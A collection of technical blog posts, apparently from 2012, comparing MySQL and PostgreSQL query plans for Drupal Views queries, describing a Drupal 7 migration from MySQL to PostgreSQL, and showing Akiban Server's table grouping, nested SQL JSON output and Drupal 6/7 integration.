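To make the nested loops strategy concrete, here is a small Python sketch of the same shape of plan: a driving table is scanned and filtered, and every surviving row triggers index lookups into the other tables. The tiny data set and the names `image_rows`, `node_by_nid` and `tids_by_nid` are made up for illustration, and the dictionaries merely stand in for primary key and secondary index lookups.

```python
# Driving table: one row per image field value (fid may be NULL/None).
image_rows = [
    {"entity_id": 1, "field_image_fid": 10},
    {"entity_id": 2, "field_image_fid": None},
    {"entity_id": 3, "field_image_fid": 12},
    {"entity_id": 4, "field_image_fid": 13},
]
# Stand-in for the node PRIMARY key lookup (eq_ref in the MySQL plan).
node_by_nid = {
    1: {"nid": 1, "status": 1},
    2: {"nid": 2, "status": 1},
    3: {"nid": 3, "status": 0},
    4: {"nid": 4, "status": 1},
}
# Stand-in for the taxonomy_index.nid index lookup (ref in the MySQL plan).
tids_by_nid = {1: [7, 8], 3: [7]}


def nested_loop_join(image_rows, node_by_nid, tids_by_nid):
    joined = []
    for image in image_rows:                        # outer loop over the driving table
        if image["field_image_fid"] is None:        # WHERE field_image_fid IS NOT NULL
            continue
        node = node_by_nid.get(image["entity_id"])  # one index lookup per outer row
        if node is None or node["status"] != 1:     # WHERE node.status = 1
            continue
        # LEFT JOIN: a node without terms still produces one row with a NULL tid.
        for tid in tids_by_nid.get(node["nid"], [None]):
            joined.append((node["nid"], tid))
    return joined


joined = nested_loop_join(image_rows, node_by_nid, tids_by_nid)

# The joined rows are materialised, grouped, sorted by count and then limited.
counts = {}
for nid, tid in joined:
    counts[tid] = counts.get(tid, 0) + 1
top = sorted(counts.items(), key=lambda item: item[1])[:24]
print(joined, top)
```

The cost of this approach grows with the number of rows in the driving table, because each of them pays for its own set of lookups.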

The PostgreSQL execution plan looks drastically different.

 Limit  (cost=11712.83..11712.89 rows=24 width=20)
   ->  Sort  (cost=11712.83..11829.24 rows=46564 width=20)
         Sort Key: (count(node.nid))
         ->  HashAggregate  (cost=9946.90..10412.54 rows=46564 width=20)
               ->  Hash Left Join  (cost=6174.69..9597.67 rows=46564 width=20)
                     Hash Cond: (taxonomy_index.tid = taxonomy_term_data.tid)
                     ->  Hash Right Join  (cost=6140.19..8922.92 rows=46564 width=12)
                           Hash Cond: (taxonomy_index.nid = node.nid)
                           ->  Seq Scan on taxonomy_index  (cost=0.00..1510.18 rows=92218 width=16)
                           ->  Hash  (cost=5657.14..5657.14 rows=38644 width=4)
                                 ->  Hash Join  (cost=2030.71..5657.14 rows=38644 width=4)
                                       Hash Cond: (node.nid = field_data_field_image.entity_id)
                                       ->  Seq Scan on node  (cost=0.00..2187.66 rows=76533 width=8)
                                             Filter: (status = 1)
                                       ->  Hash  (cost=1547.66..1547.66 rows=38644 width=8)
                                             ->  Seq Scan on field_data_field_image  (cost=0.00..1547.66 rows=38644 width=8)
                                                   Filter: ((field_image_fid IS NOT NULL) AND ((entity_type)::text = 'node'::text) AND (deleted = 0::smallint))
                     ->  Hash  (cost=22.00..22.00 rows=1000 width=12)
                           ->  Seq Scan on taxonomy_term_data  (cost=0.00..22.00 rows=1000 width=12)

PostgreSQL has a number of other join algorithms available for use. In particular, for this query, the optimizer has decided that a hash join is the optimal choice.

PostgreSQL starts by scanning the tiny (1000 rows) taxonomy_term_data table and constructing an in-memory hash table (the build phase in a hash join). It then probes this hash table for possible matches of taxonomy_index.tid = taxonomy_term_data.tid for each row that results from a hash join of taxonomy_index and node. The node rows that feed that join are themselves the result of an earlier hash join of field_data_field_image and node, in which field_data_field_image is used to build a hash table and a sequential scan of node is used to probe it. Aggregation is then performed and the result set is sorted by the aggregated value (in this case a count of node ids). Finally, the result set is limited to 24.
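
The build and probe phases of a hash join can be sketched in a few lines of Python. This is only an illustration of the technique under simplifying assumptions: the rows are invented, the helper `hash_join` is hypothetical, and it performs inner joins only, whereas the plan above uses left and right outer variants.

```python
from collections import Counter


def hash_join(build_rows, probe_rows, build_key, probe_key):
    """Inner hash join: build a hash table on one input, probe it with the other."""
    table = {}
    for row in build_rows:                      # build phase
        table.setdefault(row[build_key], []).append(row)
    for probe in probe_rows:                    # probe phase
        for match in table.get(probe[probe_key], []):
            yield {**match, **probe}


images = [{"entity_id": 1}, {"entity_id": 2}]
nodes = [{"nid": 1, "status": 1}, {"nid": 2, "status": 1}, {"nid": 3, "status": 1}]
taxonomy_index = [{"nid": 1, "tid": 7}, {"nid": 2, "tid": 7}, {"nid": 1, "tid": 8}]

# field_data_field_image builds the hash table, a scan of node probes it.
image_nodes = list(hash_join(images, nodes, "entity_id", "nid"))
# That result builds the next hash table, a scan of taxonomy_index probes it.
tagged = list(hash_join(image_nodes, taxonomy_index, "nid", "nid"))

# Hash aggregation (count per term), then sort by the count and apply the limit.
counts = Counter(row["tid"] for row in tagged)
result = sorted(counts.items(), key=lambda item: item[1])[:24]
print(result)
```

Each input is read once, so the work is roughly proportional to the size of the two inputs rather than to one lookup per outer row.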

One neat thing about PostgreSQL is that individual planner node types can be disabled for a session. So to make PostgreSQL execute the query in a similar manner to MySQL, I did:

drupal=> set enable_hashjoin=off;
SET
drupal=> set enable_hashagg=off;
SET
drupal=> set enable_mergejoin=off;
SET
drupal=>

And the execution plan PostgreSQL chose then was:

 Limit  (cost=52438.04..52438.10 rows=24 width=20)
   ->  Sort  (cost=52438.04..52552.82 rows=45913 width=20)
         Sort Key: (count(node.nid))
         ->  GroupAggregate  (cost=50237.67..51155.93 rows=45913 width=20)
               ->  Sort  (cost=50237.67..50352.45 rows=45913 width=20)
                     Sort Key: taxonomy_term_data.name, taxonomy_index.tid
                     ->  Nested Loop Left Join  (cost=0.00..46682.48 rows=45913 width=20)
                           ->  Nested Loop Left Join  (cost=0.00..33783.81 rows=45913 width=12)
                                 ->  Nested Loop  (cost=0.00..18575.38 rows=38644 width=4)
                                       ->  Seq Scan on field_data_field_image  (cost=0.00..1547.66 rows=38644 width=8)
                                             Filter: ((field_image_fid IS NOT NULL) AND ((entity_type)::text = 'node'::text) AND (deleted = 0::smallint))
                                       ->  Index Scan using node_pkey on node  (cost=0.00..0.43 rows=1 width=8)
                                             Index Cond: (nid = field_data_field_image.entity_id)
                                             Filter: (status = 1)
                                 ->  Index Scan using taxonomy_index_nid_idx on taxonomy_index  (cost=0.00..0.36 rows=3 width=16)
                                       Index Cond: (node.nid = nid)
                           ->  Index Scan using taxonomy_term_data_pkey on taxonomy_term_data  (cost=0.00..0.27 rows=1 width=12)
                                 Index Cond: (taxonomy_index.tid = tid)

The above plan takes 2 seconds to execute against PostgreSQL. You can see it is very similar to the MySQL plan. It starts with the field_data_field_image table and performs nested loop joins to join the remainder of the tables. In this case, an expensive sort must be performed before the aggregation. Using the HashAggregate operator in PostgreSQL would greatly reduce that cost.
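
The difference between the two aggregation strategies can be sketched in Python. This is an analogy rather than PostgreSQL's implementation: `group_aggregate` sorts its input first so that equal keys are adjacent, while `hash_aggregate` counts keys in a hash table in a single pass. The sample rows are invented.

```python
from collections import Counter
from itertools import groupby

# (term name, tid) pairs as they might come out of the joins, in no useful order.
rows = [("news", 3), ("art", 1), ("news", 3), ("art", 1), ("news", 3)]


def group_aggregate(rows):
    """Sort, then count runs of equal keys (needs the whole input sorted first)."""
    ordered = sorted(rows)
    return {key: sum(1 for _ in group) for key, group in groupby(ordered)}


def hash_aggregate(rows):
    """Count keys in a hash table; no sort of the input is required."""
    return dict(Counter(rows))


print(group_aggregate(rows))
print(hash_aggregate(rows))
```

Both produce the same counts; the sort-based version simply pays for ordering every joined row before it can start counting.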

So you can see out of the box, PostgreSQL performs much better on this query.

Simple View

I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen here.

The resulting SQL query that gets executed by this view is:

SELECT DISTINCT node.title                            AS node_title, 
                node.nid                              AS nid, 
                node_comment_statistics.comment_count AS 
                node_comment_statistics_comment_count, 
                node.created                          AS node_created 
FROM   node node 
       INNER JOIN node_comment_statistics node_comment_statistics 
         ON node.nid = node_comment_statistics.nid 
WHERE  (( ( node.status = '1' ) 
          AND ( node.comment IN ( '2' ) ) 
          AND ( node.nid >= '111' ) 
          AND ( node_comment_statistics.comment_count >= '2' ) ))
ORDER  BY node_created ASC 
LIMIT  50 offset 0

The response time of the query in MySQL versus PostgreSQL is shown in the figure below.

As seen in the image above, PostgreSQL can execute the query in question in 200 ms or less whereas MySQL can take up to 1000 ms to execute the query.

The MySQL execution plan looks like:

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: index
possible_keys: PRIMARY,node_status_type
          key: node_created
      key_len: 4
          ref: NULL
         rows: 100
        Extra: Using where; Using temporary
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node_comment_statistics
         type: eq_ref
possible_keys: PRIMARY,comment_count
          key: PRIMARY
      key_len: 4
          ref: drupal.node.nid
         rows: 1
        Extra: Using where

MySQL chooses to start from the node table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the DISTINCT). For each distinct row in the temporary table, MySQL then performs a join to the node_comment_statistics table by performing an index lookup using its primary key.

The PostgreSQL execution plan for this query looks like:

 Limit  (cost=6207.15..6207.27 rows=50 width=42)
   ->  Sort  (cost=6207.15..6250.75 rows=17441 width=42)
         Sort Key: node.created
         ->  HashAggregate  (cost=5453.36..5627.77 rows=17441 width=42)
               ->  Hash Join  (cost=1985.31..5278.95 rows=17441 width=42)
                     Hash Cond: (node.nid = node_comment_statistics.nid)
                     ->  Seq Scan on node  (cost=0.00..2589.32 rows=38539 width=34)
                           Filter: ((nid >= 111) AND (status = 1) AND (comment = 2))
                     ->  Hash  (cost=1546.22..1546.22 rows=35127 width=16)
                           ->  Seq Scan on node_comment_statistics  (cost=0.00..1546.22 rows=35127 width=16)
                                 Filter: (comment_count >= 2::bigint)

PostgreSQL chooses to start by scanning the node_comment_statistics table and building an in-memory hash table. This hash table is then probed for possible matches of node.nid = node_comment_statistics.nid for each row that results from a sequential scan of the node table. The result of this hash join is then aggregated (for the DISTINCT) before being sorted and limited to 50 rows.

It's worth noting that with out-of-the-box settings, the above query would do a disk-based sort (the sort method is viewable using EXPLAIN ANALYZE in PostgreSQL). When doing a disk-based sort, the query takes about 450 ms to execute. I was running all my tests with work_mem set to 4MB, though, which results in a top-N heapsort being used.
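
The idea behind a top-N heapsort is that only the N best rows seen so far need to be kept in memory, rather than sorting the whole input. A minimal Python sketch of that idea, using the standard library's `heapq.nsmallest` on invented rows (PostgreSQL's own implementation is of course different):

```python
import heapq
import random


def top_n(rows, n, key):
    """Return the n smallest rows by key without fully sorting the input."""
    return heapq.nsmallest(n, rows, key=key)


random.seed(0)
created = random.sample(range(1000000), 10000)  # distinct made-up timestamps
nodes = [{"nid": nid, "created": ts} for nid, ts in enumerate(created, start=1)]

# Equivalent in spirit to ORDER BY created ASC LIMIT 50.
first_page = top_n(nodes, 50, key=lambda row: row["created"])
print(len(first_page), first_page[0])
```

With a LIMIT of 50, the working set stays tiny no matter how many rows the join produces, which is why it fits comfortably in memory.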

Conclusion

In my opinion, the only issue with using PostgreSQL as your Drupal database is that some contributed modules will not work out of the box with that configuration.

Certainly, from a performance point of view, I see no issues with using PostgreSQL with Drupal. In fact, for Drupal sites using the Views module (probably the majority), I would say PostgreSQL is probably even a better option than MySQL due to its more advanced optimizer and execution engine. This does assume pgbouncer is being used and Drupal is not connecting directly to PostgreSQL. Users who do not use pgbouncer and perform simple benchmarks like the ones I did with ab are likely to see poor performance against PostgreSQL.

I’m working a lot with Drupal on PostgreSQL these days. I’ll be sure to share any interesting experiences I have here.

Migrating Drupal 7 Site from MySQL to PostgreSQL on Ubuntu 10.04

2012-06-26T00:00:00-07:00

I recently needed to migrate a Drupal 7 site running on a MySQL 5.5 database to a PostgreSQL 9.1 database. This brief post describes the steps I took to achieve this. The steps outlined here were only tested on Ubuntu 10.04.

First, I installed a fresh copy of PostgreSQL 9.1.

sudo apt-get install python-software-properties
sudo add-apt-repository ppa:pitti/postgresql
sudo apt-get update
sudo apt-get install postgresql-9.1 libpq-dev

After the installation is complete, a schema and a user account are created for Drupal.

sudo su postgres
createuser -D -A -P drupal
createdb --encoding=UTF8 -O drupal drupal
exit

The above creates a user account named drupal (you will be prompted for a password for the user account when running the command) and a schema named drupal.

Next, PostgreSQL needs to be configured to allow connections from Apache for Drupal. This is done by modifying the /etc/postgresql/9.1/main/pg_hba.conf file. The following line needs to be commented out or deleted:

local   all             all                                     peer

The line to be added to this file is:

host    drupal          drupal          127.0.0.1/32            password

After this file is modified, PostgreSQL needs to be restarted.

sudo service postgresql restart

For the migration, we are going to assume drush is installed on the server where we will be performing the migration. We are also going to assume MySQL and PostgreSQL are running on the same server, although this is certainly not a requirement for these instructions.

The module that performs the real work of the migration is the dbtng_migrator module. This module is installed in the same manner as any other Drupal module. After the module is installed, the settings.php file for your Drupal installation needs to be modified to point to your source and destination databases. In my case, I updated my settings.php file to look like:

$databases = array (
  'default' => array (
    'default' =>
      array (
        'database' => 'drupal',
        'username' => 'drupal',
        'password' => 'drupal',
        'host' => 'localhost',
        'port' => '',
        'driver' => 'mysql',
        'prefix' => '',
      ),
  ),
  'dest' => array (
    'default' =>
      array (
        'database' => 'drupal',
        'username' => 'drupal',
        'password' => 'drupal',
        'host' => 'localhost',
        'port' =>'',
        'driver' => 'pgsql',
        'prefix' =>'',
      ),
    ),
);

As you can see in my case, the default schema that I am currently running on is a MySQL database and I am planning on migrating to a PostgreSQL database running on the same machine.

Now, to perform the migration from the command line using drush, it's as simple as:

drush cache-clear drush
drush dbtng-replicate default dest

When the migration finishes, output similar to the following will be seen (this is just a small portion of the output):

$ drush dbtng-replicate default dest
...
cache_update successfully migrated.                    [status]
authmap successfully migrated.                         [status]
role_permission successfully migrated.                 [status]
role successfully migrated.                            [status]
users successfully migrated.                           [status]
users_roles successfully migrated.                     [status]
$
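
One simple sanity check after a migration like this is to compare row counts per table between the source and destination databases. The Python sketch below is an assumption on my part and not part of dbtng_migrator: `row_counts` and `mismatched_tables` are hypothetical helpers that work with any DB-API connection, and the demo uses two in-memory SQLite databases as stand-ins for MySQL and PostgreSQL.

```python
import sqlite3


def row_counts(conn, tables):
    """Return {table: row count} for trusted table names on a DB-API connection."""
    counts = {}
    cur = conn.cursor()
    for table in tables:
        # Table names cannot be bound as parameters; only pass known names here.
        cur.execute("SELECT COUNT(*) FROM " + table)
        counts[table] = cur.fetchone()[0]
    return counts


def mismatched_tables(source, dest, tables):
    """Return {table: (source count, dest count)} where the counts differ."""
    src, dst = row_counts(source, tables), row_counts(dest, tables)
    return {t: (src[t], dst[t]) for t in tables if src[t] != dst[t]}


# Demo with SQLite stand-ins: the destination is missing one row in users.
source = sqlite3.connect(":memory:")
dest = sqlite3.connect(":memory:")
for conn, user_rows in ((source, 3), (dest, 2)):
    conn.execute("CREATE TABLE users (uid INTEGER)")
    conn.execute("CREATE TABLE role (rid INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?)", [(i,) for i in range(user_rows)])
    conn.execute("INSERT INTO role VALUES (1)")

mismatches = mismatched_tables(source, dest, ["users", "role"])
print(mismatches)
```

Matching counts do not prove the data is identical, but a mismatch is a cheap early warning before switching settings.php over.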

Finally, after the database migration is successfully completed, the settings.php file needs to be updated to point to the new database. In my case, the database settings after my migration looked like:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
  ),
);

That was it for my migration. Granted, I had a small Drupal site to migrate and the only additional modules I had installed were the Views and Devel modules, so I did not need to worry about contributed modules working with the PostgreSQL database. The next step would be to configure PostgreSQL in a more optimal manner, which I did not go into here.

How Akiban Saves Babies

2012-05-24T00:00:00-07:00

I came across an interesting article from Iggy Fernandez in the NoCOUG journal this month that prompted me to write a short little post showing a little of what we are working on at Akiban. Iggy also has a blog post that is pretty similar to the article.

We are big fans of the relational model and one thing that I loved about Iggy’s article was the re-iteration of the fact that Codd never dictated how data should be stored. Hence, at Akiban we are working on a new relational database that stores data in a different manner that we refer to as table grouping.

In this post, I wanted to briefly show how we could group the schema Iggy used in his article and how that data can be retrieved. Below I show the DDL for the tables as we would create them in Akiban. You will notice the one addition in our DDL is the specification of a grouping foreign key. The DDL below creates a single table group with the employees table as the root and all other tables as children.

create table employees 
(
  emp_no int primary key not null,
  name varchar(16),
  birth_date date
);

create table job_history 
(
  emp_no int not null,
  job_date date not null,
  title varchar(16),
  grouping foreign key (emp_no) references employees
);

create table salary_history 
(
  emp_no int not null,
  job_date date not null,
  salary_date date not null,
  salary decimal,
  grouping foreign key (emp_no) references employees
);

create table children 
(
  emp_no int not null,
  child_name varchar(16) not null,
  birth_date date,
  grouping foreign key (emp_no) references employees
);

insert into employees values (1, 'IGNATIES', '1970-01-01');

insert into children values (1, 'INIGA', '2001-01-01');
insert into children values (1, 'INIGO', '2001-01-01');

insert into job_history values (1, '1991-01-01', 'PROGRAMMER');
insert into job_history values (1, '1992-01-01', 'DATABASE ADMIN');

insert into salary_history values (1, '1991-01-01', '1991-01-02', 1000);
insert into salary_history values (1, '1991-01-01', '1991-01-03', 1000);
insert into salary_history values (1, '1992-01-01', '1992-01-02', 2000);
insert into salary_history values (1, '1992-01-01', '1992-01-03', 2000);

test=> select * from employees;
 emp_no |   name   | birth_date 
--------+----------+------------
      1 | IGNATIES | 1970-01-01
(1 row)

Time: 3.529 ms
test=> select * from children;
 emp_no | child_name | birth_date 
--------+------------+------------
      1 | INIGA      | 2001-01-01
      1 | INIGO      | 2001-01-01
(2 rows)

Time: 4.058 ms
test=> select * from job_history;
 emp_no |  job_date  |     title      
--------+------------+----------------
      1 | 1991-01-01 | PROGRAMMER
      1 | 1992-01-01 | DATABASE ADMIN
(2 rows)

Time: 3.954 ms
test=> select * from salary_history;
 emp_no |  job_date  | salary_date | salary 
--------+------------+-------------+--------
      1 | 1991-01-01 | 1991-01-02  |   1000
      1 | 1991-01-01 | 1991-01-03  |   1000
      1 | 1992-01-01 | 1992-01-02  |   2000
      1 | 1992-01-01 | 1992-01-03  |   2000
(4 rows)

Time: 3.868 ms
test=>

Ok, now we have a simple dataset with 1 employee. In Akiban, all data for that 1 employee is essentially stored pre-joined. I explained previously how we accomplish this in a post on the company blog so I won’t go into detail here.

Now what if I wanted to get all employee information for this person in one go? In Iggy’s article, Oracle’s multi-table clustering functionality is used to make sure doing that is efficient and then SQL/XML is used to query it and construct a single XML document with all the employee's information.

Well, in Akiban, we’ve implemented support for nested SQL. This allows us to return data as objects instead of returning data in tabular form. We decided to format the objects we return in JSON for our first implementation of this functionality. Now if I want to get all information for employee 1 in a single query with a nested result in JSON format, I simply need to enable that mode in Akiban and issue a query like the one shown below.

select 
  employees.*,
  (select children.* from children where employees.emp_no = children.emp_no),                       
  (select job_history.* from job_history where employees.emp_no = job_history.emp_no),                
  (select salary_history.* from salary_history where employees.emp_no = salary_history.emp_no) 
from 
  employees

Ok, now to enable nested result sets and fire the query off. This is exactly what the interaction with our system will look like.

test=> set OutputFormat = 'json';
SET OutputFormat
Time: 1.290 ms
test=> select 
test->   employees.*,
test->   (select children.* from children where employees.emp_no = children.emp_no),                       
test->   (select job_history.* from job_history where employees.emp_no = job_history.emp_no),                
test->   (select salary_history.* from salary_history where employees.emp_no = salary_history.emp_no) 
test-> from 
test->   employees;
                                                                                                                                                                                                                                                                                                                                         JSON                                                                                                                                                                                                                                                                                                                                          
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 {"emp_no":1,"name":"IGNATIES","birth_date":"1970-01-01","_SQL_COL_1":[{"emp_no":1,"child_name":"INIGA","birth_date":"2001-01-01"},{"emp_no":1,"child_name":"INIGO","birth_date":"2001-01-01"}],"_SQL_COL_2":[{"emp_no":1,"job_date":"1991-01-01","title":"PROGRAMMER"},{"emp_no":1,"job_date":"1992-01-01","title":"DATABASE ADMIN"}],"_SQL_COL_3":[{"emp_no":1,"job_date":"1991-01-01","salary_date":"1991-01-02","salary":"1000"},{"emp_no":1,"job_date":"1991-01-01","salary_date":"1991-01-03","salary":"1000"},{"emp_no":1,"job_date":"1992-01-01","salary_date":"1992-01-02","salary":"2000"},{"emp_no":1,"job_date":"1992-01-01","salary_date":"1992-01-03","salary":"2000"}]}
(1 row)

Time: 12.230 ms
test=>

If you scroll to the right above, you will see the nested result set with all of the information for employee 1. Also notice that we have an easy way to enable/disable nested result set functionality. Setting this format to ‘table’ results in tabular output. The result set above nicely formatted is shown next.

{
    "emp_no": 1,
    "name": "IGNATIES",
    "birth_date": "1970-01-01",
    "_SQL_COL_1": [
        {
            "emp_no": 1,
            "child_name": "INIGA",
            "birth_date": "2001-01-01"
        },
        {
            "emp_no": 1,
            "child_name": "INIGO",
            "birth_date": "2001-01-01"
        }
    ],
    "_SQL_COL_2": [
        {
            "emp_no": 1,
            "job_date": "1991-01-01",
            "title": "PROGRAMMER"
        },
        {
            "emp_no": 1,
            "job_date": "1992-01-01",
            "title": "DATABASE ADMIN"
        }
    ],
    "_SQL_COL_3": [
        {
            "emp_no": 1,
            "job_date": "1991-01-01",
            "salary_date": "1991-01-02",
            "salary": "1000"
        },
        {
            "emp_no": 1,
            "job_date": "1991-01-01",
            "salary_date": "1991-01-03",
            "salary": "1000"
        },
        {
            "emp_no": 1,
            "job_date": "1992-01-01",
            "salary_date": "1992-01-02",
            "salary": "2000"
        },
        {
            "emp_no": 1,
            "job_date": "1992-01-01",
            "salary_date": "1992-01-03",
            "salary": "2000"
        }
    ]
}
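
For anyone consuming this output from a program, the row is ordinary JSON, so it can be parsed and re-indented with any JSON library. A short Python sketch, where `raw` is a shortened copy of the row above that keeps only the first nested column:

```python
import json

# Shortened copy of the JSON row returned above (children only).
raw = (
    '{"emp_no":1,"name":"IGNATIES","birth_date":"1970-01-01",'
    '"_SQL_COL_1":[{"emp_no":1,"child_name":"INIGA","birth_date":"2001-01-01"},'
    '{"emp_no":1,"child_name":"INIGO","birth_date":"2001-01-01"}]}'
)

employee = json.loads(raw)
# Re-indent the document for reading, as in the formatted version above.
pretty = json.dumps(employee, indent=4)
# Nested result sets arrive as lists of objects under the generated column name.
child_names = [child["child_name"] for child in employee["_SQL_COL_1"]]

print(pretty)
print(child_names)
```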

Now there is no reason we could not decide to write an XML outputter in the future. JSON is what we have gone with at the moment because we all like JSON here and we have a few people who are not such big fans of XML.

Since this is nested SQL, I can just select what I want and filter the result set using predicates. Let's say I only want birth dates of children named ‘INIGA’ and salary history and job information for the ‘DATABASE ADMIN’ role. I can also give aliases to anything in my SELECT clause.

I could write a query like the following:

select 
  employees.*,
  (select children.birth_date from children where employees.emp_no = children.emp_no and child_name = 'INIGA') as children, 
  (select job_history.job_date from job_history where employees.emp_no = job_history.emp_no and title = 'DATABASE ADMIN') as job, 
  (select salary_history.salary from salary_history where employees.emp_no = salary_history.emp_no and job_date = '1992-01-01') as salary
from 
  employees

The above query would return a result set like (after formatting):

{
    "emp_no": 1,
    "name": "IGNATIES",
    "birth_date": "1970-01-01",
    "children": [
        {
            "birth_date": "2001-01-01"
        }
    ],
    "job": [
        {
            "job_date": "1992-01-01"
        }
    ],
    "salary": [
        {
            "salary": "2000"
        },
        {
            "salary": "2000"
        }
    ]
}
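
To show what the nested query is computing, here is a plain Python emulation over the sample rows inserted earlier. It is only a sketch of the semantics, not of how Akiban executes the query: the helper `nested` is hypothetical, and salaries are kept as strings to match how the decimal column is rendered in the output above.

```python
employees = [{"emp_no": 1, "name": "IGNATIES", "birth_date": "1970-01-01"}]
children = [
    {"emp_no": 1, "child_name": "INIGA", "birth_date": "2001-01-01"},
    {"emp_no": 1, "child_name": "INIGO", "birth_date": "2001-01-01"},
]
job_history = [
    {"emp_no": 1, "job_date": "1991-01-01", "title": "PROGRAMMER"},
    {"emp_no": 1, "job_date": "1992-01-01", "title": "DATABASE ADMIN"},
]
salary_history = [
    {"emp_no": 1, "job_date": "1991-01-01", "salary_date": "1991-01-02", "salary": "1000"},
    {"emp_no": 1, "job_date": "1991-01-01", "salary_date": "1991-01-03", "salary": "1000"},
    {"emp_no": 1, "job_date": "1992-01-01", "salary_date": "1992-01-02", "salary": "2000"},
    {"emp_no": 1, "job_date": "1992-01-01", "salary_date": "1992-01-03", "salary": "2000"},
]


def nested(rows, emp_no, predicate, columns):
    """Emulate one correlated subquery: filter child rows, project some columns."""
    return [
        {column: row[column] for column in columns}
        for row in rows
        if row["emp_no"] == emp_no and predicate(row)
    ]


result = [
    {
        **emp,
        "children": nested(children, emp["emp_no"],
                           lambda r: r["child_name"] == "INIGA", ["birth_date"]),
        "job": nested(job_history, emp["emp_no"],
                      lambda r: r["title"] == "DATABASE ADMIN", ["job_date"]),
        "salary": nested(salary_history, emp["emp_no"],
                         lambda r: r["job_date"] == "1992-01-01", ["salary"]),
    }
    for emp in employees
]
print(result[0])
```

Each subquery in the SELECT list becomes one list-valued key on the parent object, named by its alias.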

That's all I wanted to touch on in this post, but I aim to write a different post comparing table-grouping with Oracle multi-table clusters in the future. In the meantime, we do have a short piece of text discussing the difference on our Zendesk portal.

Our nested SQL quickstart guide also has examples of this functionality if you are interested in seeing more. In that quick-start, we use the employees sample database from MySQL.

Using Akiban Server with Drupal 6

2012-05-18T00:00:00-07:00

In my previous post, I mentioned I’m working on a database driver for Drupal 7 for the Akiban Server. However, we have some clients who use Drupal 6 so I wanted to talk about how we work with those clients in this post.

Drupal 6 does not have a database abstraction layer so it is not as easy to integrate Akiban in this case. With Drupal 6, we do not attempt to run all of Drupal on Akiban. What we have done with our existing customers who use Drupal 6 is to send certain problem queries to Akiban (running in our MySQL replication configuration) and everything else to MySQL. The Akiban Server speaks the PostgreSQL protocol as I discussed before. Hence, for Drupal 6, we use the PostgreSQL database driver to talk to Akiban.

Since Drupal 6 does not support speaking to multiple different database backends at the same time, we apply a patch to get started. Basically, this patch allows connections to be open to both an existing MySQL server and the Akiban Server at the same time. It could be used to do the same with a PostgreSQL database as well.

Once that patch is applied, to send a query to Akiban, the active database connection is set to Akiban and a query is fired off for the Akiban Server to execute. The following code snippet shows an example.

$result = FALSE; /* make sure $result is defined when Akiban is not used */
if ($this->use_akiban) {
   db_set_active('akiban');
   $result = db_query_range($query, 
                            $args, 
                            $offset, 
                            $this->pager['items_per_page']);
}
db_set_active('default'); /* always switch back to the MySQL connection */
if (! $result) { /* if Akiban failed go to regular MySQL */
   $result = db_query_range($query, 
                            $args, 
                            $offset, 
                            $this->pager['items_per_page']);
}

As can be seen in the code above, it's also possible to detect if the query failed against Akiban and re-issue it against MySQL.

When deployed in this configuration, connection details for the Akiban Server are specified in the settings.php file for a Drupal site.

$db_url = array(
  "default" => "mysql://drupal:drupal@mysql_hostname/drupal_schema",
  "akiban"  => "pgsql://drupal:drupal@akiban_hostname:15432/drupal_schema"
);

We’ve also done some work with clients where we have made patches to the Views module for Drupal. These patches allow a client to send the queries generated by a specific view to an Akiban Server.

Taken together, this makes it quite easy for us to work with Drupal 6 and send problematic queries to Akiban.

Akiban Server Progress with Drupal 7

2012-05-14T00:00:00-07:00

The call for papers for DrupalCon Munich closed on Friday and I submitted a session related to the work I’m doing on developing a database module for the Akiban Server with Drupal 7. That work has not been open sourced yet but will be before August. We also plan on open sourcing and releasing the Akiban Server for public download by August as well. The end result of this work will be a database driver for the Akiban Server that will allow Drupal 7 to run on Akiban.

In this post, I wanted to briefly show the type of results I’ve been seeing from running Drupal on Akiban. To do this, I constructed a simple view using the Views module and benchmarked the query that resulted from this view.

Environment Setup

I also created an AMI from the running instance after all the steps outlined were performed. This AMI has MySQL 5.6 installed along with Drupal 7.12 and data generated with drush.

The Akiban AMI cannot be made available for general download yet since we have not open-sourced our stack as of this time. Once our stack has been open-sourced I will update this post with a link to an AMI that can be downloaded. However, if you are interested in seeing the results here for yourself, feel free to contact me and I should be able to grant access to an EC2 instance for testing.

Data Generation

I used drush and the devel modules to generate data so the view would be operating on some data. I generated the following data:

users	50000
tags	1000
vocabularies	5000
menus	5000
nodes	100000
max comments per node	10

View and SQL Query

I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen here.

The resulting SQL query that gets executed by this view is:

SELECT DISTINCT node.title                            AS node_title, 
                node.nid                              AS nid, 
                node_comment_statistics.comment_count AS 
                node_comment_statistics_comment_count, 
                node.created                          AS node_created 
FROM   node node 
       INNER JOIN node_comment_statistics node_comment_statistics 
         ON node.nid = node_comment_statistics.nid 
WHERE  (( ( node.status = '1' ) 
          AND ( node.comment IN ( '2' ) ) 
          AND ( node.nid >= '111' ) 
          AND ( node_comment_statistics.comment_count >= '2' ) ))
ORDER  BY node_created ASC 
LIMIT  50 offset 0

Performance Comparison

The response time of the query in Akiban versus MySQL is shown below.

As seen in the image above, Akiban can execute the query in question in 5 ms or less whereas MySQL consistently takes 1200 ms to execute the query. In the next section I’ll go into details of how Akiban executes this query.

Secondly, numbers were obtained using the mysqlslap benchmark tool from MySQL to demonstrate how Akiban performs versus MySQL with varying degrees of concurrency.

MySQL Execution Plan

Using Maatkit to visualize the MySQL execution plan, we get:

JOIN
+- Filter with WHERE
|  +- Bookmark lookup
|     +- Table
|     |  table          node_comment_statistics
|     |  possible_keys  PRIMARY,comment_count
|     +- Unique index lookup
|        key            node_comment_statistics->PRIMARY
|        possible_keys  PRIMARY,comment_count
|        key_len        4
|        ref            drupal.node.nid
|        rows           1
+- Table scan
   +- TEMPORARY
      table          temporary(node)
      +- Filter with WHERE
         +- Bookmark lookup
            +- Table
            |  table          node
            |  possible_keys  PRIMARY,node_status_type
            +- Index scan
               key            node->node_created
               possible_keys  PRIMARY,node_status_type
               key_len        4
               rows           100

